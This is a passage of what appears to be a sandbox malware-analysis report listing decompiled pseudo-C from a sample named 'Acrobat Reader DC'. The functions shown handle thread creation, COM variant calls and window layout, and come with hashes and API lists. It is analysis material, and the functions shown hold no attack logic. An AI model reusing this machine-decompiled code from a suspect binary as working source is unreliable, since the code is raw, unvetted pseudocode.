						if(_t26 != 0) {
							E00417F9D(_t26);
						}
						_t16 = 0;
						__eflags = 0;
						L10:
						return _t16;
					}
					_push( *((intOrPtr*)(E00417A69(0, __eflags) + 0x6c)));
					_push(_t36);
					E0041793C(0, _t33, _t34, _t36, __eflags);
					 *(_t36 + 4) =  *(_t36 + 4) | 0xffffffff;
					 *((intOrPtr*)(_t36 + 0x58)) = _a16;
					_t21 = _a24;
					 *((intOrPtr*)(_t36 + 0x54)) = _t34;
					__eflags = _t21;
					if(_t21 == 0) {
						_t21 =  &_a12;
					}
					_t16 = CreateThread(_a4, _a8, E00413D1A, _t36, _a20, _t21);
					__eflags = _t16;
					if(_t16 != 0) {
						goto L10;
					} else {
						_t26 = GetLastError();
						goto L7;
					}
				}
				 *((intOrPtr*)(E00417F77(_t38))) = 0x16;
				E00417F25();
				return 0;
			}












                                  0x00413d86
                                  0x00413d89
                                  0x00413d8b
                                  0x00413d8d
                                  0x00413da4
                                  0x00413db5
                                  0x00413db9
                                  0x00413dbb
                                  0x00413e06
                                  0x00413e07
                                  0x00413e0d
                                  0x00413e0f
                                  0x00413e12
                                  0x00413e17
                                  0x00413e18
                                  0x00413e18
                                  0x00413e1a
                                  0x00000000
                                  0x00413e1a
                                  0x00413dc2
                                  0x00413dc5
                                  0x00413dc6
                                  0x00413dce
                                  0x00413dd2
                                  0x00413dd5
                                  0x00413dda
                                  0x00413ddd
                                  0x00413ddf
                                  0x00413de1
                                  0x00413de1
                                  0x00413df4
                                  0x00413dfa
                                  0x00413dfc
                                  0x00000000
                                  0x00413dfe
                                  0x00413e04
                                  0x00000000
                                  0x00413e04
                                  0x00413dfc
                                  0x00413d94
                                  0x00413d9a
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit__initptd_free
                                  • String ID:
                                  • API String ID: 73303432-0
                                  • Opcode ID: 15d135404abbfae3dd626878a66f96d7bdc2d254561257f6c736b1c7f734c682
                                  • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                  • Opcode Fuzzy Hash: 15d135404abbfae3dd626878a66f96d7bdc2d254561257f6c736b1c7f734c682
                                  • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0047974B Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E0047974B(void* __fp0, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr* _a16, char _a19, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v60;
				char _v92;
				signed int _v224;
				signed char _v232;
				signed int _v236;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t152;
				signed int _t159;
				signed int _t166;
				signed int _t168;
				signed int _t172;
				intOrPtr _t174;
				signed int _t186;
				signed int _t188;
				signed int _t195;
				signed char _t196;
				signed int _t203;
				signed int _t204;
				signed char _t205;
				short* _t206;
				short* _t207;
				intOrPtr* _t217;
				signed int _t221;
				intOrPtr* _t240;
				intOrPtr _t257;
				signed int _t259;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t275;

				_t275 = __fp0;
				_t240 = _a16;
				_t263 =  *(_a24 + 8);
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v40 = 0xfffffffd;
				_v12 = 0;
				_v16 = 0;
				_a19 = 0;
				if(_t240 == 0 || _a12 == 0 || _a20 == 0) {
					return E00451B42(_a4, 1, 0, L"NULL Pointer assignment", 1);
				} else {
					if(E00432416(_t240) != 0) {
						_t264 =  *( *_t240 + 8);
						__eflags = _t264;
						if(_t264 != 0) {
							_v236 = 0;
							_t152 = E00441EBA(_t264, _a20,  &_v12);
							_t268 = _t267 + 0xc;
							__eflags = _t152;
							if(_t152 >= 0) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									_t194 = _v12;
									_a8 = 3;
									__eflags = _v12;
									if(__eflags != 0) {
										_t195 = E00451D2B(_t264, _t194, _a20,  &_v236);
										_t268 = _t268 + 0x10;
										__eflags = _t195;
										if(__eflags >= 0) {
											_t196 = _v232;
											__eflags = _t196 & 0x00000001;
											if((_t196 & 0x00000001) != 0) {
												__eflags = _v224;
												if(_v224 == 0) {
													_a19 = 1;
												}
											}
											__eflags = _t196 - 1;
											if(__eflags == 0) {
												_a8 = _t196;
											}
										}
									}
								}
								_t203 = _t263 + 1;
								_push( ~(0 | __eflags > 0x00000000) | ( ~(0 | __eflags > 0x00000000) | _t203 * 0x00000010) + 0x00000004);
								_t159 = E00410E53(_t263, _t264, __eflags);
								__eflags = _t159;
								if(_t159 == 0) {
									_a20 = 0;
								} else {
									 *_t159 = _t203;
									_t41 = _t159 + 4; // 0x4
									_a20 = _t41;
									E00410CA0(_t263 + 1, 0x437095, _t41, 0x10);
								}
								_t204 = 0;
								__eflags = _t263;
								if(_t263 != 0) {
									_t259 = _t263 + _t263;
									__eflags = _t259;
									_t49 = _t259 * 8; // -16
									_v8 = _a20 + _t49 - 0x10;
									do {
										E00479714( *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t204 * 4)), _t263, _t275, _v8,  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t204 * 4)));
										_v8 = _v8 - 0x10;
										_t204 = _t204 + 1;
										__eflags = _t204 - _t263;
									} while (_t204 < _t263);
								}
								__eflags = _v236;
								if(_v236 != 0) {
									_t186 = 0;
									_v8 = 0;
									__eflags = _t263;
									if(_t263 != 0) {
										_t63 = (_t263 + _t263) * 8; // -16
										_t207 = _a20 + _t63 - 0x10;
										do {
											__eflags =  *((short*)(_t266 + _t186 * 4 - 0xd6)) - 2;
											if( *((short*)(_t266 + _t186 * 4 - 0xd6)) == 2) {
												__imp__#9(_t207);
												_t188 = _v8;
												 *_t207 =  *((intOrPtr*)(_t266 + _t188 * 4 - 0xd8));
												_t257 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t188 * 4));
												__eflags =  *((intOrPtr*)(_t257 + 8)) - 6;
												if( *((intOrPtr*)(_t257 + 8)) != 6) {
													 *((intOrPtr*)(_t207 + 8)) = _t207;
												}
											}
											_t186 = _v8 + 1;
											_t207 = _t207 - 0x10;
											_v8 = _t186;
											__eflags = _t186 - _t263;
										} while (_t186 < _t263);
									}
								}
								_t205 = _a8;
								_v28 = _t263;
								_v36 = _a20;
								__eflags = _t205 & 0x0000000c;
								if((_t205 & 0x0000000c) != 0) {
									_v24 = 1;
									_v32 =  &_v40;
								}
								__imp__#8( &_v60);
								E00412F40( &_v92, 0, 0x20);
								__eflags = _a19;
								if(_a19 == 0) {
									_push( &_v20);
									_push( &_v92);
									_push( &_v60);
									_push( &_v36);
									_t217 =  *((intOrPtr*)( *_t264 + 0x18));
								} else {
									_t217 =  *((intOrPtr*)( *_t264 + 0x18));
									_push( &_v20);
									_push( &_v92);
									_push(0);
									_push( &_v36);
								}
								_t166 =  *_t217(_t264, _v12, 0x482a18, 0x800, _t205);
								__eflags = _t166 - 0x80020003;
								if(_t166 != 0x80020003) {
									L38:
									__eflags = _t166;
									if(_t166 >= 0) {
										E00468070(_a12,  &_v60);
										_t265 = 0;
										__eflags = _t263;
										if(_t263 != 0) {
											_t172 = _t263 + _t263;
											__eflags = _t172;
											_t121 = _t172 * 8; // -16
											_t206 = _a20 + _t121 - 0x10;
											do {
												__eflags = _v236;
												if(_v236 == 0) {
													_t174 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t265 * 4));
													__eflags =  *((intOrPtr*)(_t174 + 8)) - 6;
													if( *((intOrPtr*)(_t174 + 8)) == 6) {
														goto L52;
													}
												} else {
													_t174 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t265 * 4));
													__eflags =  *((intOrPtr*)(_t174 + 8)) - 6;
													_t221 =  *(_t266 + _t265 * 4 - 0xd8) & 0x0000ffff;
													if( *((intOrPtr*)(_t174 + 8)) == 6) {
														__eflags = _t221 - 0x6013;
														if(_t221 != 0x6013) {
															__eflags =  *(_t266 + _t265 * 4 - 0xd6) & 0x00000002;
															if(( *(_t266 + _t265 * 4 - 0xd6) & 0x00000002) != 0) {
																L52:
																E00468070(E00432508(_t174), _t206);
															} else {
																__eflags = _t221 & 0x00004000;
																if((_t221 & 0x00004000) != 0) {
																	goto L52;
																} else {
																	__eflags =  *_t206 - 8;
																	if( *_t206 == 8) {
																		goto L52;
																	}
																}
															}
														}
													}
												}
												_t265 = _t265 + 1;
												_t206 = _t206 - 0x10;
												__eflags = _t265 - _t263;
											} while (_t265 < _t263);
										}
									} else {
										__eflags = _t166 - 0x80020009;
										if(_t166 != 0x80020009) {
											goto L41;
										} else {
											_v16 = E00451B42(_a4, _t166,  &_v92, 0, 1);
										}
									}
								} else {
									__eflags = _v24 - 1;
									if(_v24 != 1) {
										L41:
										_v16 = E00451B42(_a4, _t166, 0, 0, 1);
									} else {
										__eflags = _t205 - 4;
										_t104 = _t205 == 4;
										__eflags = _t104;
										_t166 =  *((intOrPtr*)( *((intOrPtr*)( *_t264 + 0x18))))(_t264, _v12, 0x482a18, 0x800, 4 + (0 | _t104) * 4,  &_v36, 0,  &_v92,  &_v20);
										goto L38;
									}
								}
								__imp__#9( &_v60);
								_t168 = _a20;
								__eflags = _t168;
								if(_t168 != 0) {
									E00470028(_t168);
								}
								return _v16;
							} else {
								return E00451B42(_a4, _t152, 0, 0, 1);
							}
						} else {
							return E00451B42(_a4, 4, 0, L"NULL Pointer assignment", 1);
						}
					} else {
						return E00451B42(_a4, 2, 0, L"Not an Object type", 1);
					}
				}
			}















































                                  0x0047974b
                                  0x00479754
                                  0x0047975f
                                  0x00479762
                                  0x00479765
                                  0x00479768
                                  0x0047976b
                                  0x0047976e
                                  0x00479775
                                  0x00479778
                                  0x0047977b
                                  0x00479780
                                  0x00479b06
                                  0x00479798
                                  0x004797a0
                                  0x004797c0
                                  0x004797c3
                                  0x004797c5
                                  0x004797ec
                                  0x004797f2
                                  0x004797f7
                                  0x004797fa
                                  0x004797fc
                                  0x00479815
                                  0x0047981a
                                  0x0047981c
                                  0x0047981f
                                  0x00479826
                                  0x00479828
                                  0x00479837
                                  0x0047983c
                                  0x0047983f
                                  0x00479841
                                  0x00479843
                                  0x00479849
                                  0x0047984b
                                  0x0047984d
                                  0x00479854
                                  0x00479856
                                  0x00479856
                                  0x00479854
                                  0x0047985a
                                  0x0047985d
                                  0x0047985f
                                  0x0047985f
                                  0x0047985d
                                  0x00479841
                                  0x00479828
                                  0x00479864
                                  0x00479883
                                  0x00479884
                                  0x0047988c
                                  0x0047988e
                                  0x004798af
                                  0x00479890
                                  0x00479890
                                  0x00479892
                                  0x0047989f
                                  0x004798a2
                                  0x004798aa
                                  0x004798b6
                                  0x004798b8
                                  0x004798ba
                                  0x004798c1
                                  0x004798c1
                                  0x004798c3
                                  0x004798c7
                                  0x004798ca
                                  0x004798d8
                                  0x004798dd
                                  0x004798e1
                                  0x004798e2
                                  0x004798e2
                                  0x004798ca
                                  0x004798e6
                                  0x004798ed
                                  0x004798ef
                                  0x004798f1
                                  0x004798f4
                                  0x004798f6
                                  0x004798ff
                                  0x004798ff
                                  0x0047990b
                                  0x0047990b
                                  0x00479914
                                  0x00479917
                                  0x0047991d
                                  0x0047992b
                                  0x00479931
                                  0x00479934
                                  0x00479938
                                  0x0047993a
                                  0x0047993a
                                  0x00479938
                                  0x00479940
                                  0x00479941
                                  0x00479944
                                  0x00479947
                                  0x00479947
                                  0x0047990b
                                  0x004798f6
                                  0x0047994b
                                  0x00479951
                                  0x00479954
                                  0x00479957
                                  0x0047995a
                                  0x0047995f
                                  0x00479966
                                  0x00479966
                                  0x0047996d
                                  0x0047997b
                                  0x00479983
                                  0x00479987
                                  0x004799a3
                                  0x004799a7
                                  0x004799ae
                                  0x004799af
                                  0x004799b0
                                  0x00479989
                                  0x0047998b
                                  0x00479991
                                  0x00479995
                                  0x00479996
                                  0x0047999b
                                  0x0047999b
                                  0x004799c3
                                  0x004799c5
                                  0x004799ca
                                  0x00479a07
                                  0x00479a07
                                  0x00479a09
                                  0x00479a4b
                                  0x00479a50
                                  0x00479a52
                                  0x00479a54
                                  0x00479a5b
                                  0x00479a5b
                                  0x00479a5d
                                  0x00479a5d
                                  0x00479a61
                                  0x00479a61
                                  0x00479a68
                                  0x00479aab
                                  0x00479aae
                                  0x00479ab2
                                  0x00000000
                                  0x00000000
                                  0x00479a6a
                                  0x00479a70
                                  0x00479a73
                                  0x00479a77
                                  0x00479a7f
                                  0x00479a86
                                  0x00479a89
                                  0x00479a8b
                                  0x00479a93
                                  0x00479ab4
                                  0x00479abd
                                  0x00479a95
                                  0x00479a95
                                  0x00479a9b
                                  0x00000000
                                  0x00479a9d
                                  0x00479a9d
                                  0x00479aa1
                                  0x00000000
                                  0x00479aa3
                                  0x00479aa1
                                  0x00479a9b
                                  0x00479a93
                                  0x00479a89
                                  0x00479a7f
                                  0x00479ac2
                                  0x00479ac3
                                  0x00479ac6
                                  0x00479ac6
                                  0x00479a61
                                  0x00479a0b
                                  0x00479a0b
                                  0x00479a10
                                  0x00000000
                                  0x00479a12
                                  0x00479a24
                                  0x00479a24
                                  0x00479a10
                                  0x004799cc
                                  0x004799cc
                                  0x004799d0
                                  0x00479a2c
                                  0x00479a3c
                                  0x004799d2
                                  0x004799d6
                                  0x004799da
                                  0x004799da
                                  0x00479a05
                                  0x00000000
                                  0x00479a05
                                  0x004799d0
                                  0x00479ace
                                  0x00479ad4
                                  0x00479ad7
                                  0x00479ad9
                                  0x00479adc
                                  0x00479adc
                                  0x00479aea
                                  0x004797fe
                                  0x00479812
                                  0x00479812
                                  0x004797c7
                                  0x004797e0
                                  0x004797e0
                                  0x004797a2
                                  0x004797bb
                                  0x004797bb
                                  0x004797a0

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorLast
                                  • String ID: NULL Pointer assignment$Not an Object type
                                  • API String ID: 2487901850-572801152
                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E004404E8(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				int _v8;
				int _v12;
				int _v16;
				signed int _v20;
				struct HWND__** _v24;
				signed int _v28;
				void* _t152;
				signed int _t153;
				signed int _t159;
				int _t160;
				signed int _t173;
				signed char _t175;
				int _t176;
				struct HWND__* _t179;
				signed char _t181;
				signed char _t186;
				signed int _t189;
				signed int _t201;
				signed int _t207;
				int _t213;
				int _t214;
				signed int _t218;
				intOrPtr _t223;
				signed int _t227;
				signed int _t232;
				intOrPtr _t242;
				signed int _t246;
				signed int _t249;
				signed int _t250;
				signed char _t251;
				struct HWND__** _t260;
				signed int _t261;
				struct HWND__* _t268;
				struct HWND__** _t269;
				void* _t277;
				void* _t295;

				_t213 = _a8;
				_t268 = _a4;
				_t153 = E00430C09(_t152, 0x4a8630, _t268);
				_t223 =  *0x4a8690; // 0x0
				_t260 =  *( *(_t223 + _t153 * 4));
				_v24 = _t260;
				_a4 = _t260[0x11];
				_a8 = _t260[0x12];
				if(_t260[0x68] != 0) {
					_a8 = _a8 - GetSystemMetrics(0xf);
				}
				if(_a4 <= 0 || _a8 <= 0 || _a12 <= 0 || _a16 <= 0 || _t213 == 1) {
					return DefDlgProcW(_t268, 5, _t213, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				} else {
					_t159 = 3;
					_v28 = 3;
					_t277 =  *0x4a86b4 - _t159; // 0x2
					if(_t277 >= 0) {
						do {
							_t242 =  *0x4a86a4; // 0xa71980
							_t269 =  *( *(_t242 + _t159 * 4));
							if(_t269 != 0 && _t269[1] == _t260[1] &&  *_t269 != 0) {
								asm("cdq");
								_t227 = _t269[0x21];
								_t261 = _t269[0x21];
								_v8 = _t269[0x20] * _a12 / _a4;
								asm("cdq");
								_v20 = _t269[0x20] * _a16 / _a8;
								asm("cdq");
								_v16 = _t227 * _a12 / _a4;
								_t173 = _t261 * _a16;
								asm("cdq");
								_t246 = _t173 % _a8;
								_v12 = _t173 / _a8;
								_t175 = _t269[0x1f] & 0x0000ffff;
								if(_t175 == 0) {
									_t176 = _v20;
									_t214 = _v8;
								} else {
									if((_t175 & 0x00000100) == 0) {
										L19:
										_t214 = _v8;
									} else {
										_v16 = _t227;
										if((_t175 & 0x00000006) != 0) {
											goto L19;
										} else {
											_t201 = _a12;
											if((_t175 & 0x00000008) == 0) {
												_t214 = _v8;
												asm("cdq");
												if(_t214 > _t201 - _t246 >> 1) {
													_t218 = _a4;
													_t207 = (_t218 - _t269[0x20] - _v16) * _a12;
													asm("cdq");
													_t246 = _t207 % _t218;
													_t214 = _a12 - _t207 / _t218 - _v16;
													_v8 = _t214;
												}
											} else {
												asm("cdq");
												_t214 = _t269[0x20] + (_t201 - _a4 - _t246 >> 1);
												_v8 = _t214;
											}
										}
									}
									_t186 = _t269[0x1f] & 0x0000ffff;
									if((_t186 & 0x00000200) == 0) {
										L26:
										_t176 = _v20;
									} else {
										_v12 = _t261;
										if((_t186 & 0x00000060) != 0) {
											goto L26;
										} else {
											_t189 = _a16;
											if(_t186 >= 0) {
												asm("cdq");
												_t176 = _v20;
												if(_t176 > _t189 - _t246 >> 1) {
													_t217 = _a8;
													asm("cdq");
													_t214 = _v8;
													_t176 = _a16 - (_a8 - _t269[0x20] - _v12) * _a16 / _t217 - _v12;
												}
											} else {
												asm("cdq");
												_t176 = _t269[0x20] + (_t189 - _a8 - _t246 >> 1);
											}
										}
									}
									_t249 = _t269[0x1f] & 0x0000ffff;
									_v20 = _t249;
									_t250 = _t249 & 0x00000002;
									_v8 = _t250;
									if(_t250 != 0) {
										_t214 = _t269[0x20];
									}
									if((_v20 & 0x00000004) != 0) {
										if(_v8 == 0) {
											_t214 = _t269[0x20] + _t227 - _v16 - _a4 + _a12;
										} else {
											_v16 = _t227 - _t214 - _a4 + _t269[0x20] + _a12;
										}
									}
									_t251 = _v20;
									_t232 = _t251 & 0x00000020;
									if(_t232 != 0) {
										_t176 = _t269[0x20];
									}
									if((_t251 & 0x00000040) != 0) {
										if(_t232 == 0) {
											_t176 = _t269[0x20] + _t261 - _v12 - _a8 + _a16;
										} else {
											_v12 = _t261 - _t176 - _a8 + _t269[0x20] + _a16;
										}
									}
								}
								MoveWindow( *_t269, _t214, _t176, _v16, _v12, 0);
								_t179 = _t269[0x22];
								if(_t179 != 0) {
									if(_t179 != 0x16 || (_t269[0x22] & 0x00000020) != 0) {
										goto L42;
									} else {
										SendMessageW( *_t269, 0x469, _t269[0xc], 0);
										_t181 = _t269[0x22];
										if(_t181 == 0xff) {
											goto L42;
										} else {
											_t260 = _v24;
											if((_t181 & 0x000000ff) != _t260[0x65]) {
												ShowWindow( *_t269, 0);
											}
											goto L43;
										}
									}
									goto L51;
								} else {
									SendMessageW( *_t269, 0x142, 0, 0xffff);
									L42:
									_t260 = _v24;
								}
							}
							L43:
							_t159 = _v28 + 1;
							_v28 = _t159;
							_t295 = _t159 -  *0x4a86b4; // 0x2
						} while (_t295 <= 0);
					}
					_t160 = InvalidateRect( *_t260, 0, 1);
					_t260[0x62] = 1;
					_t260[0xe] = 0;
					return _t160;
				}
				L51:
			}







































                                  0x004404ef
                                  0x004404f3
                                  0x004404fd
                                  0x00440502
                                  0x0044050b
                                  0x0044051a
                                  0x0044051d
                                  0x00440520
                                  0x00440523
                                  0x0044052d
                                  0x0044052d
                                  0x00440534
                                  0x00440823
                                  0x00440561
                                  0x00440561
                                  0x00440566
                                  0x00440569
                                  0x0044056f
                                  0x00440578
                                  0x00440578
                                  0x00440581
                                  0x00440585
                                  0x004405ab
                                  0x004405af
                                  0x004405b6
                                  0x004405bd
                                  0x004405cb
                                  0x004405cf
                                  0x004405d8
                                  0x004405dc
                                  0x004405e1
                                  0x004405e5
                                  0x004405e6
                                  0x004405e9
                                  0x004405ec
                                  0x004405f3
                                  0x0044074e
                                  0x00440751
                                  0x004405f9
                                  0x004405fe
                                  0x00440657
                                  0x00440657
                                  0x00440600
                                  0x00440600
                                  0x00440605
                                  0x00000000
                                  0x00440607
                                  0x00440609
                                  0x0044060c
                                  0x00440626
                                  0x00440629
                                  0x00440630
                                  0x00440632
                                  0x00440643
                                  0x00440647
                                  0x00440648
                                  0x0044064f
                                  0x00440652
                                  0x00440652
                                  0x0044060e
                                  0x00440611
                                  0x0044061f
                                  0x00440621
                                  0x00440621
                                  0x0044060c
                                  0x00440605
                                  0x0044065a
                                  0x00440663
                                  0x004406bb
                                  0x004406bb
                                  0x00440665
                                  0x00440665
                                  0x0044066a
                                  0x00000000
                                  0x0044066c
                                  0x0044066e
                                  0x00440671
                                  0x00440686
                                  0x0044068b
                                  0x00440692
                                  0x00440694
                                  0x004406a9
                                  0x004406ac
                                  0x004406b6
                                  0x004406b6
                                  0x00440673
                                  0x00440676
                                  0x00440682
                                  0x00440682
                                  0x00440671
                                  0x0044066a
                                  0x004406be
                                  0x004406c2
                                  0x004406c5
                                  0x004406c8
                                  0x004406cb
                                  0x004406cd
                                  0x004406cd
                                  0x004406d8
                                  0x004406df
                                  0x00440706
                                  0x004406e1
                                  0x004406f2
                                  0x004406f2
                                  0x004406df
                                  0x00440709
                                  0x0044070e
                                  0x00440711
                                  0x00440713
                                  0x00440713
                                  0x0044071d
                                  0x00440722
                                  0x00440749
                                  0x00440724
                                  0x00440735
                                  0x00440735
                                  0x00440722
                                  0x0044071d
                                  0x00440763
                                  0x00440769
                                  0x00440771
                                  0x004407c1
                                  0x00000000
                                  0x004407cc
                                  0x004407da
                                  0x004407e0
                                  0x004407e8
                                  0x00000000
                                  0x004407ea
                                  0x004407ea
                                  0x004407f6
                                  0x004407fd
                                  0x004407fd
                                  0x00000000
                                  0x004407f6
                                  0x004407e8
                                  0x00000000
                                  0x00440773
                                  0x00440782
                                  0x00440788
                                  0x00440788
                                  0x00440788
                                  0x00440771
                                  0x0044078b
                                  0x0044078e
                                  0x0044078f
                                  0x00440792
                                  0x00440792
                                  0x00440578
                                  0x004407a5
                                  0x004407ab
                                  0x004407b2
                                  0x004407bc
                                  0x004407bc
                                  0x00000000

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00440527
                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                  • String ID:
                                  • API String ID: 1457242333-0
                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0044734F(void* __fp0, long* _a4, intOrPtr _a8, char _a11) {
				long _v8;
				struct tagPOINT* _v12;
				long _v16;
				long _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v68;
				void* _t97;
				struct tagPOINT* _t99;
				long _t100;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t110;
				void* _t112;
				long* _t113;

				_t113 = _a4;
				_t109 = _a8;
				_t100 = 0xfffffffe;
				_a11 = 0;
				_v20 = 0;
				_v16 = 0xfffffffe;
				_v24 = 1;
				_v28 = _t109;
				if(_t109 == 0) {
					L26:
					E0042FD29(_t113, _t100);
					return _a11;
				}
				while(1) {
					_v12 = 0;
					E0044719B(_t113, _v20, _t100, 0, _v24);
					if( *((intOrPtr*)(_t109 + 0xc)) <= 0) {
						goto L25;
					}
					_v8 = _t109 + 0x10;
					_a4 = _t109 + 0x14;
					do {
						_t112 =  *_v8;
						_t97 = ( *(_v28 + _v12 + 0x810) & 0x000000ff) + 0xfffffff8;
						if(_t97 > 0x10) {
							goto L23;
						}
						switch( *((intOrPtr*)(( *(_t97 + 0x4475bb) & 0x000000ff) * 4 +  &M00447597))) {
							case 0:
								__edi = __edi | 0xffffffff;
								if(_v20 != __edi) {
									__edx = _v16;
									__eax = E0042FD29(__esi, _v16);
								}
								__eax = _v8;
								__eax =  *_v8;
								if(__eax != __edi) {
									_v20 = __eax;
								}
								__eax =  *_a4;
								if(__eax != __edi) {
									_v16 = __eax;
								}
								__edx = _v24;
								_v16 = E0044719B(__esi, _v20, _v16, 0, _v24);
								goto L23;
							case 1:
								__edx = _v16;
								_v12 =  &(_v12->x);
								__eax = 8;
								_a4 =  &(_a4[2]);
								_v8 = _v8 + 8;
								E0042FD29(__esi, _v16) = _v24;
								__edx = _v20;
								E0044719B(__esi, _v20, _v16, 0, _v24) = _a4;
								__edx = _v8;
								__eax =  *_v8;
								_push( *_a4 + __ebx);
								__eax =  *_v8 + __edi;
								_push( *_v8 + __edi);
								goto L22;
							case 2:
								_v12 =  &(_v12->x);
								__eax = 8;
								_a4 =  &(_a4[2]);
								_v8 = _v8 + 8;
								__eax = E0042FD29(__esi, _v16);
